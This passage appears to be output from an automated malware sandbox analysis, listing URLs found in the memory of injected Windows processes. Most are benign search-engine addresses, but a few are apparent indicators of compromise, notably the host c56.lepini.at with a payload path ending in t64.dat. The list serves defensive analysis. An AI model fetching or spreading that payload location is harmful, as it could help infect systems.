            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://busca.orange.es/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
            Source: explorer.exe, 0000001E.00000000.826232602.000000000A7C9000.00000004.00000001.sdmpString found in binary or memory: http://c56.lepini.at/
            Source: explorer.exe, 0000001E.00000000.826232602.000000000A7C9000.00000004.00000001.sdmpString found in binary or memory: http://c56.lepini.at//
            Source: explorer.exe, 0000001E.00000000.834306189.000000000FCE0000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000000.826664235.000000000A897000.00000004.00000001.sdmpString found in binary or memory: http://c56.lepini.at/jvassets/xI/t64.dat
            Source: explorer.exe, 0000001E.00000000.826232602.000000000A7C9000.00000004.00000001.sdmpString found in binary or memory: http://c56.lepini.at/s
            Source: explorer.exe, 0000001E.00000000.826002988.000000000A68A000.00000004.00000001.sdmpString found in binary or memory: http://c56.lepini.at:80/jvassets/xI/t64.dat
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://cnet.search.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
            Source: powershell.exe, 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp, control.exe, 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp, rundll32.exe, 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
            Source: powershell.exe, 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp, control.exe, 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp, rundll32.exe, 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
            Source: powershell.exe, 00000012.00000003.771957559.000001EFF5CE8000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: powershell.exe, 00000012.00000003.772095234.000001EFF6021000.00000004.00000001.sdmpString found in binary or memory: http://crl.microsof
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://es.ask.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
            Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
            Source: powershell.exe, 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp, control.exe, 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp, rundll32.exe, 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
            Source: RuntimeBroker.exe, 00000020.00000002.913125750.000001B4F86D9000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cmg
            Source: RuntimeBroker.exe, 00000020.00000002.913125750.000001B4F86D9000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.co/xa
            Source: RuntimeBroker.exe, 00000020.00000002.913125750.000001B4F86D9000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.ux
            Source: RuntimeBroker.exe, 00000020.00000002.913125750.000001B4F86D9000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobp/
            Source: RuntimeBroker.exe, 00000020.00000002.913125750.000001B4F86D9000.00000004.00000001.sdmpString found in binary or memory: http://ns.micro/1
            Source: powershell.exe, 00000012.00000003.756510695.000001EF815B0000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
            Source: powershell.exe, 00000012.00000003.752397998.000001EF81050000.00000004.00000001.sdmp, powershell.exe, 00000012.00000002.811569054.000001EF8020F000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
            Source: powershell.exe, 00000012.00000002.810095687.000001EF80001000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
            Source: explorer.exe, 0000001E.00000000.829895180.000000000D9E0000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
            Source: RuntimeBroker.exe, 00000020.00000000.821757355.000001B4FAF7D000.00000004.00000001.sdmpString found in binary or memory: http://twitter.com/spotify:
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
            Source: RuntimeBroker.exe, 00000020.00000003.856750140.000001B4FAF45000.00000004.00000001.sdmpString found in binary or memory: http://universalstore.streaming.mediaservices.windows.net/411ee20d-d1b8-4d57-ae3f-af22235d79d9/1f8e1
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
            Source: explorer.exe, 0000001E.00000000.829895180.000000000D9E0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
            Source: explorer.exe, 0000001E.00000000.807813167.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
            Source: powershell.exe, 00000012.00000003.752397998.000001EF81050000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 00000012.00000003.752397998.000001EF81050000.00000004.00000001.sdmp, powershell.exe, 00000012.00000002.811569054.000001EF8020F000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
